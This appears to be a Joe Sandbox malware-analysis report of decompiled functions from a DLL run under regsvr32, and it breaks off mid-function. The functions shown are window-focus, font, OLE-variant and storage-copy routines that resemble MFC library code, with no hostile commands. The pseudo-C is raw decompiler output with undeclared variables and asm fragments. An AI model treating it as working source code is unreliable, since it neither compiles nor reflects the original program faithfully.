Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: a423982cdb4445666ff142e75d3f275899161f5a5907fd303f69c14c7b230c9c
Instruction ID: e85eb02237999a7012c7b0064b89368cd0961b399c4234c762095ab2dcff7244
Opcode Fuzzy Hash: a423982cdb4445666ff142e75d3f275899161f5a5907fd303f69c14c7b230c9c
Instruction Fuzzy Hash: 4A51DC309006099BCB09DFA8C8859EEBBB5EF45340F254569F941EF192EB34DE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001593A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001593A(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __edi;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10015912(__ebx, __ecx, __ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L11:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1001799A(_t41);
						L14:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L11;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x20);
							_v8 = GetFocus();
							E10013FEA(_t30, _t34, _t44, SetActiveWindow( *(_t41 + 0x20)));
							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}

0x1001593a
0x1001593d
0x10015940
0x10015942
0x1001594a
0x10015950
0x10015954
0x10015959
0x100159d9
0x100159de
0x100159f0
0x100159f0
0x00000000
0x100159e4
0x100159e6
0x100159eb
0x100159ed
0x100159f2
0x100159f5
0x100159f5
0x100159de
0x1001595b
0x1001595e
0x00000000
0x00000000
0x10015960
0x10015963
0x10015976
0x10015980
0x10015982
0x10015983
0x10015995
0x1001599b
0x100159ae
0x100159bf
0x100159c2
0x100159c2
0x100159cc
0x100159d1
0x100159d1
0x100159cc
0x10015980
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 10015986
SetActiveWindow.USER32(?), ref: 10015998
SendMessageA.USER32 ref: 100159AE
IsWindow.USER32(?), ref: 100159BB
SetActiveWindow.USER32(?), ref: 100159C2
IsWindow.USER32(?), ref: 100159C7
SetFocus.USER32 ref: 100159D1

Strings

u, xrefs: 100159D9

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: e5e53b18d9a7c366fb47b6aecd64b0bcb1539c99c57c71f07f20d61b63d9c445
Instruction ID: 07e167e0145e98c525f9007698f833c98e51d59fe92ab2647bdf042b11ac3786
Opcode Fuzzy Hash: e5e53b18d9a7c366fb47b6aecd64b0bcb1539c99c57c71f07f20d61b63d9c445
Instruction Fuzzy Hash: A011E632900215EBEB10EB75CD05AAE7EA9EF443B2F044126ED46DE161D636DD80DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1002A5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1002A5C0(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1004763E(E1002A471(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x1002a5c6
0x1002a5cd
0x1002a5d2
0x1002a5db
0x1002a5de
0x1002a5e1
0x1002a5e6
0x1002a5ea
0x1002a5f4
0x1002a603
0x1002a607
0x1002a614
0x1002a616
0x1002a618
0x1002a618
0x1002a633
0x1002a636
0x1002a636
0x1002a63c
0x1002a63c
0x1002a642
0x1002a644
0x1002a644
0x1002a65f
0x1002a65f
0x1002a5ee
0x1002a5f2
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 1002A5E6
GetStockObject.GDI32(0000000D), ref: 1002A5EE
GetObjectA.GDI32(00000000,0000003C,?), ref: 1002A5FB
GetDC.USER32(00000000), ref: 1002A60A
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A61E
MulDiv.KERNEL32 ref: 1002A62A
ReleaseDC.USER32(00000000,00000000), ref: 1002A636

Strings

System, xrefs: 1002A5E1, 1002A64B

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: b457f8b68ae8ebe2aa2b29e7c3b07adf861c146a59385abbc08cb9b12b5b583a
Instruction ID: 6fa32537bea77ea401c086acbfad8471d090d4f731cd6c3d02efb41ce348b637
Opcode Fuzzy Hash: b457f8b68ae8ebe2aa2b29e7c3b07adf861c146a59385abbc08cb9b12b5b583a
Instruction Fuzzy Hash: 6711BF71A40268EBEB00DBA0DD89FAE7BB8EF46781F400055FA02A6181DFB49D41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1003A2DF Relevance: 13.8, APIs: 9, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E1003A2DF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E100476EC(0x10090ee9, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E1001E397(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_push( *(_t191 + 8) << 4);
					_t127 = L10001492(_t173, _t185, _t187, _t191, __eflags);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E10048380(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E10049170(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E100395F6(_t173, _t176, _t187, _t192, _t195,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_push(_t49);
						_t135 = L10001492(_t173, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E10047748(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E1001D714();
							goto L7;
						}
						E10048380(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x1009ee28;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E10039FF7(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E10039D42(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E10039D98(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E1001D714();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1003A5EF))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E10039D98(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E1001D714();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E10040466();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E10040466();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E10040466();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E10040466();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(L10001492(_t173, _t185, _t19, _t190, _t201) != 0) {
					E10048380(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					L1000A7FB(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

0x1003a2df
0x1003a2df
0x1003a2df
0x1003a2e6
0x1003a2eb
0x1003a2f4
0x1003a2f9
0x1003a2fc
0x1003a2ff
0x1003a303
0x1003a306
0x1003a30a
0x1003a30d
0x1003a312
0x1003a312
0x1003a318
0x1003a31e
0x1003a322
0x1003a327
0x1003a32e
0x1003a331
0x1003a3a5
0x1003a3a5
0x1003a3ae
0x1003a3af
0x1003a3b4
0x1003a3b6
0x1003a3b7
0x1003a3c8
0x1003a3cb
0x1003a3d1
0x00000000
0x00000000
0x1003a3d3
0x1003a3d8
0x1003a3dd
0x1003a3e0
0x1003a3e8
0x1003a3ed
0x1003a3fb
0x1003a3fd
0x1003a3fd
0x1003a400
0x1003a401
0x1003a406
0x1003a409
0x1003a341
0x1003a341
0x1003a349
0x1003a355
0x1003a5e2
0x1003a5ea
0x1003a5ea
0x1003a34b
0x1003a34e
0x1003a350
0x1003a350
0x00000000
0x1003a350
0x1003a411
0x1003a416
0x1003a419
0x1003a41b
0x1003a41d
0x1003a424
0x1003a427
0x1003a42a
0x1003a42d
0x1003a436
0x1003a437
0x1003a43d
0x1003a440
0x1003a444
0x1003a447
0x1003a44a
0x1003a44b
0x1003a44e
0x1003a44f
0x1003a454
0x1003a456
0x1003a459
0x1003a4b4
0x1003a4b4
0x1003a4b7
0x1003a4b9
0x1003a4bc
0x1003a4d7
0x1003a4d7
0x1003a4db
0x1003a4de
0x1003a52b
0x1003a530
0x1003a533
0x1003a535
0x1003a591
0x1003a591
0x1003a594
0x1003a5ba
0x1003a5c0
0x1003a5c3
0x1003a5c7
0x1003a5cc
0x1003a5d0
0x1003a5d4
0x1003a5d6
0x1003a5d9
0x1003a5db
0x1003a5db
0x1003a5e0
0x00000000
0x1003a5e0
0x1003a596
0x1003a596
0x1003a597
0x1003a5a1
0x1003a5a1
0x1003a5a3
0x1003a5a8
0x1003a5a8
0x00000000
0x1003a5a3
0x1003a599
0x1003a599
0x1003a59c
0x1003a5b1
0x00000000
0x1003a5b1
0x1003a59e
0x1003a59f
0x00000000
0x00000000
0x00000000
0x1003a59f
0x1003a537
0x1003a53a
0x1003a540
0x1003a543
0x1003a546
0x00000000
0x00000000
0x1003a548
0x00000000
0x1003a577
0x1003a577
0x00000000
0x00000000
0x1003a588
0x00000000
0x00000000
0x1003a565
0x00000000
0x00000000
0x1003a56d
0x00000000
0x00000000
0x1003a554
0x1003a557
0x1003a55a
0x1003a55d
0x00000000
0x00000000
0x1003a572
0x1003a575
0x00000000
0x00000000
0x1003a57d
0x1003a580
0x1003a582
0x1003a583
0x1003a584
0x1003a585
0x00000000
0x00000000
0x00000000
0x00000000
0x1003a54f
0x00000000
0x00000000
0x1003a548
0x1003a4e0
0x1003a4e4
0x1003a4e9
0x1003a4ed
0x1003a4f1
0x1003a4f3
0x1003a4f6
0x1003a4f8
0x1003a4f8
0x00000000
0x1003a4fd
0x1003a4c4
0x1003a4c7
0x1003a4cd
0x1003a4d1
0x1003a4d2
0x1003a4d2
0x00000000
0x1003a4c4
0x1003a45b
0x1003a45f
0x1003a462
0x1003a463
0x1003a464
0x1003a467
0x1003a46b
0x1003a49f
0x1003a4a4
0x1003a4aa
0x1003a4ad
0x1003a4ad
0x00000000
0x1003a4ad
0x1003a46d
0x1003a470
0x1003a495
0x1003a495
0x1003a49a
0x00000000
0x1003a49a
0x1003a472
0x1003a475
0x00000000
0x00000000
0x1003a47a
0x1003a47d
0x1003a491
0x1003a47f
0x1003a484
0x1003a487
0x1003a487
0x00000000
0x1003a47d
0x1003a3b9
0x1003a3b9
0x1003a3bd
0x1003a3c0
0x00000000
0x00000000
0x1003a3c2
0x1003a3c5
0x00000000
0x1003a3c5
0x1003a333
0x1003a333
0x1003a336
0x1003a33f
0x1003a361
0x1003a366
0x1003a369
0x1003a36f
0x1003a374
0x1003a379
0x1003a37d
0x1003a380
0x1003a384
0x1003a387
0x1003a38b
0x1003a38b
0x1003a38c
0x1003a390
0x1003a394
0x1003a395
0x1003a398
0x1003a3a0
0x1003a3a3
0x1003a3a3
0x00000000
0x1003a3a3
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1003A2E6
lstrlenA.KERNEL32(00000000,000000FF,00000050,1002AA26,00000000,00000001,?,?,000000FF,?,?,?), ref: 1003A318
__alloca_probe_16.LIBCMT ref: 1003A361

Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B

__alloca_probe_16.LIBCMT ref: 1003A3D8
_memset.LIBCMT ref: 1003A3E8
__alloca_probe_16.LIBCMT ref: 1003A411
VariantClear.OLEAUT32(?), ref: 1003A4C7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 2586305615-0
Opcode ID: 0f9be9321993a377763dde6a88daadc2fa287c8f5576e8f6b934abec6b28c4dd
Instruction ID: 8a55a60cb0bb44ec9ac80b342bc5a56f9bc70aa257b53d36690aa41eb9699fb4
Opcode Fuzzy Hash: 0f9be9321993a377763dde6a88daadc2fa287c8f5576e8f6b934abec6b28c4dd
Instruction Fuzzy Hash: 86A18B31C00649DFCF12DFA4C885AEEBBB0FF46362F204159E915AB291D735AE81DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000B0A9 Relevance: 13.7, APIs: 9, Instructions: 232
filecomstringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000B0A9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				struct HMETAFILE__* _t69;
				void* _t74;
				void* _t82;
				void* _t83;
				struct HMETAFILE__* _t84;
				void* _t85;
				void* _t87;
				void* _t89;
				struct HMETAFILE__* _t90;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t103;
				void* _t104;
				WCHAR* _t105;
				struct HMETAFILE__* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t118;
				void* _t119;
				struct HMETAFILE__* _t121;
				void _t128;
				void* _t147;
				void* _t153;
				void* _t161;

				_push(0x5c);
				E100476B6(0x1008dd90, __ebx, __edi, __esi);
				_t157 =  *(_t161 + 0xc);
				_t153 =  *(_t161 + 0x10);
				if( *_t157 != 0) {
					L10:
					_t68 =  *_t153 - 1;
					if(_t68 == 0) {
						_t69 = L1000A992(_t128,  *(_t157 + 4),  *(_t153 + 4));
						__eflags = _t69;
						if(_t69 == 0) {
							goto L19;
						} else {
							 *(_t157 + 4) = _t69;
							goto L37;
						}
					} else {
						_t74 = _t68 - 1;
						if(_t74 == 0) {
							_push( *(_t157 + 4));
							E1000B053(0, _t161 - 0x60, _t153, _t157, __eflags);
							_push( *(_t157 + 4));
							 *((intOrPtr*)(_t161 - 4)) = 0;
							E1000B053(0, _t161 - 0x5c, _t153, _t157, __eflags);
							asm("sbb esi, esi");
							asm("sbb edi, edi");
							_t157 = CopyFileA(_t153,  ~( *(_t157 + 4)) &  *(_t161 - 0x5c), 0);
							L100013E3( *(_t161 - 0x5c) + 0xfffffff0, _t147);
							L100013E3( *((intOrPtr*)(_t161 - 0x60)) + 0xfffffff0, _t147);
						} else {
							_t82 = _t74;
							if(_t82 == 0) {
								_t83 =  *(_t153 + 4);
								_t84 =  *((intOrPtr*)( *_t83 + 0x30))(_t83, _t161 - 0x58, 1);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L19;
								} else {
									_t85 =  *(_t157 + 4);
									 *((intOrPtr*)(_t161 - 0x64)) = 0;
									 *((intOrPtr*)( *_t85 + 0x14))(_t85, 0, 0, 0, 0);
									_t87 =  *(_t153 + 4);
									 *((intOrPtr*)( *_t87 + 0x14))(_t87, 0, 0, 0, 0);
									_t89 =  *(_t153 + 4);
									_t90 =  *((intOrPtr*)( *_t89 + 0x1c))(_t89,  *(_t157 + 4),  *((intOrPtr*)(_t161 - 0x50)),  *((intOrPtr*)(_t161 - 0x4c)), 0, 0);
									__eflags = _t90;
									if(_t90 != 0) {
										goto L19;
									} else {
										_t91 =  *(_t157 + 4);
										_t157 = 0;
										 *((intOrPtr*)( *_t91 + 0x14))(_t91, 0, 0, 0, 0);
										_t153 =  *(_t153 + 4);
										 *((intOrPtr*)( *_t153 + 0x14))(_t153, 0, 0, 0, 0);
										goto L37;
									}
								}
							} else {
								_t95 = _t82 - 4;
								if(_t95 == 0) {
									_t153 =  *(_t153 + 4);
									 *((intOrPtr*)( *_t153 + 0x1c))(_t153, 0, 0, 0,  *(_t157 + 4));
									asm("sbb eax, eax");
								} else {
									_t100 = _t95 - 8;
									if(_t100 == 0) {
										L16:
										if( *(_t157 + 4) != 0) {
											goto L19;
										} else {
											__imp__OleDuplicateData( *(_t153 + 4),  *((intOrPtr*)(_t161 + 8)), 0);
											 *(_t157 + 4) = _t100;
										}
									} else {
										_t100 = _t100 - 0x30;
										if(_t100 != 0) {
											goto L19;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				} else {
					_t128 =  *_t153;
					_t103 = _t128 - 1;
					if(_t103 == 0) {
						L8:
						 *_t157 = _t128;
						goto L9;
					} else {
						_t104 = _t103 - 1;
						if(_t104 == 0) {
							 *_t157 = 2;
							_t105 =  *(_t153 + 4);
							__eflags = _t105;
							if(__eflags == 0) {
								_t105 = E1000A069(0, _t128, _t153, _t157, __eflags);
							}
							 *((intOrPtr*)(_t161 - 0x60)) = lstrlenW(_t105);
							_t108 = L1000A7A4(_t128, __eflags, _t106 + 1, 2);
							__eflags = _t108;
							 *(_t157 + 4) = _t108;
							if(_t108 == 0) {
								goto L19;
							} else {
								L1000A7FB(_t153, _t157, _t161, _t108,  *((intOrPtr*)(_t161 - 0x60)) +  *((intOrPtr*)(_t161 - 0x60)) + 2,  *(_t153 + 4),  *((intOrPtr*)(_t161 - 0x60)) +  *((intOrPtr*)(_t161 - 0x60)) + 2);
								goto L37;
							}
						} else {
							_t111 = _t104;
							if(_t111 == 0) {
								_t153 =  *(_t153 + 4);
								 *(_t157 + 4) = _t153;
								 *((intOrPtr*)( *_t153 + 4))(_t153);
								 *_t157 = 4;
								goto L37;
							} else {
								_t114 = _t111 - 4;
								if(_t114 == 0) {
									_t153 =  *(_t153 + 4);
									 *(_t157 + 4) = _t153;
									 *((intOrPtr*)( *_t153 + 4))(_t153);
									 *_t157 = 8;
									goto L37;
								} else {
									_t117 = _t114 - 8;
									if(_t117 == 0) {
										 *_t157 = 0x10;
										L9:
										 *(_t157 + 4) = 0;
										goto L10;
									} else {
										_t118 = _t117 - 0x10;
										if(_t118 == 0) {
